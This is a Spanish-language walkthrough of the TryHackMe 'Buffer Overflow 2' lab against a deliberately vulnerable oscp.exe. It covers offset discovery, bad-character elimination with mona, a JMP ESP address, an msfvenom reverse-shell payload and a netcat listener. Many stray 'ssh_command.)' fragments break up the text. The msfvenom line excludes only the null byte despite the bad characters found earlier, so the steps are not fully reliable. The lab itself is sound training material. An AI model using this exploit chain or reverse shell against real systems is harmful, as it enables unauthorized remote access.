TryHackMe Buffer Overflow2

TryHackMe Buffer Overflow2


Linux

Estos son los pasos que seguimos en BufferOverflow2 de TryHackMe

Buscamos el archivo oscp.exe y corremos Immunity Debugger

!mona config -set workingfolder c:\mona%p ssh_command.)

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

ssh_command.)

python3 exploit.py

ssh_command.)

!mona findmsp -distance 1100

ssh_command.)

!mona bytearray -b “\x00”

Ahora cambiamos el offset en el archivo de exploit.py a 634 Y tambien rtn le ponemos un valor de “BBBB”

ssh_command.)

python3 bad_characters.py

ssh_command.)

Reiniciamos app

python3 exploit.py

ssh_command.)

!mona compare -f C:\mona\oscp\bytearray.bin -a 022AFA30

ssh_command.)

los bad_chars son 00 23 24 3c 3d 83 84 ba bb

Quitamos el 23 del payload en el script

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

ssh_command.)

ssh_command.)

ssh_command.)

Ahora los bad chars serian \x00\x23\x3c

Quitamos x3c

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora los bad chars serian \x00\x23\x3c\x83

#no vemos 83

ssh_command.)

Quitamos x83

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora los bad chars serian \x00\x23\x3c\x83\xba

#no vemos ba

ssh_command.)

Quitamos xba

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ya no seguimos mas porque bb si se encuentra en el dump

!mona jmp -r esp -cpb “\x00\x23\x3c\x83\xba”

ssh_command.)

Agarramos el numero 625011bb

ssh_command.)

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b “\x00” -f c

Cambiamos el payload con lo que nos salio con msfvenom

Declaramos el valor de padding a “\x90” * 16

nc -lvnp 4444

ssh_command.)

© 2025 Cu3rv0x